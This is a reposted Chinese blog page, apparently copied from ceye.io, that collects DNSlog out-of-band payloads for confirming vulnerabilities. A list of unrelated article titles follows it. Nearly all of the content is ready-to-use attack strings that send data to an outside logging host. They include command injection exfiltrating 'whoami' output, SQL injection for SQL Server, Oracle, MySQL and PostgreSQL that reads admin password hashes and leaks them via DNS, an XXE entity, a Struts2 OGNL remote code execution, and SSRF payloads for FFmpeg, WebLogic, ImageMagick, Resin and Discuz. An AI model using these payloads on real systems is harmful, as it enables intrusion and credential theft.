利用DNSlog技术间接判断漏洞是否存在的常用payload
来源:互联网 发布:那种照相软件好用 编辑:程序博客网 时间:2024/05/16 11:40
0x00 Command Execution
i. *nix:
ii. windows
i. SQL Server
ii. Oracle
iii. MySQL
iv. PostgreSQL
0x02 XML Entity Injection
i. Struts2
ii. FFMpeg
iii. Weblogic
v. Resin
vi. Discuz
i. *nix:
curl http://ip.port.b182oj.ceye.io/`whoami`ping `whoami`.ip.port.b182oj.ceye.io
ii. windows
ping %USERNAME%.b182oj.ceye.io0x01 SQL InjectionFrom http://docs.hackinglab.cn/HawkEye-Log-Dns-Sqli.html.
i. SQL Server
DECLARE @host varchar(1024);SELECT @host=(SELECT TOP 1master.dbo.fn_varbintohexstr(password_hash)FROM sys.sql_logins WHERE name='sa')+'.ip.port.b182oj.ceye.io'; EXEC('master..xp_dirtree"\\'+@host+'\foobar$"');
ii. Oracle
SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io');SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL;SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;SELECT DBMS_LDAP.INIT(('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL;SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL;
iii. MySQL
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));
iv. PostgreSQL
DROP TABLE IF EXISTS table_output;CREATE TABLE table_output(content text);CREATE OR REPLACE FUNCTION temp_function()RETURNS VOID AS $$DECLARE exec_cmd TEXT;DECLARE query_result TEXT;BEGINSELECT INTO query_result (SELECT passwdFROM pg_shadow WHERE usename='postgres');exec_cmd := E'COPY table_output(content)FROM E\'\\\\\\\\'||query_result||E'.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\'';EXECUTE exec_cmd;END;$$ LANGUAGE plpgsql SECURITY DEFINER;SELECT temp_function();
0x02 XML Entity Injection
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">%remote;]><root/>0x03 Others
i. Struts2
xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4}xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://ip.port.b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
ii. FFMpeg
#EXTM3U#EXT-X-MEDIA-SEQUENCE:0#EXTINF:10.0,concat:http://ip.port.b182oj.ceye.io#EXT-X-ENDLIST
iii. Weblogic
xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search
iv. ImageMagick
push graphic-contextviewbox 0 0 640 480fill 'url(http://ip.port.b182oj.ceye.io)'pop graphic-context
v. Resin
xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf
vi. Discuz
http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://ip.port.b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo
转载:http://ceye.io/payloads
0 0
- 利用DNSlog技术间接判断漏洞是否存在的常用payload
- 利用ajax判断用户名是否存在
- 利用javascript判断文件是否存在
- 属性是否存在的判断
- 利用JS判断图片,文件是否存在的几种方法
- 利用PackageManager判断系统中是否存在与Intent匹配的组件
- 利用AJAX在登录时判断用户名是否存在
- 利用ajax技术验证数据是否存在的一个简单例子
- 判断电脑病毒是否存在的方法
- 判断临时表是否存在的新方法
- 用于判断用户是否存在的ajax
- SQLServer2000 判断对象是否存在的语句
- 判断文件是否存在的方法
- 判断文件夹是否存在的方法
- 判断是否有同名的文件存在
- 判断文件是否存在的方法
- jquery判断元素是否存在的方法
- 判断网络上的图片是否存在
- BroadcastReceiver 广播接收者
- 机器学习-k近邻算法原理与实现
- Notifications in Android N
- <OJ_Sicily>Connection
- 说说阿怡
- 利用DNSlog技术间接判断漏洞是否存在的常用payload
- timthumb.php源码详解
- 关于数据库中表被锁定时如何操作表
- LogPolar 把图像映射到极指数空间
- KVM他说的基于内核的虚拟机是什么意思呢?
- OO的五大原则
- 局部变量和全局变量以及成员变量的区别
- Jsp中翻页功能实现
- Android Context完全解析,你所不知道的Context的各种细节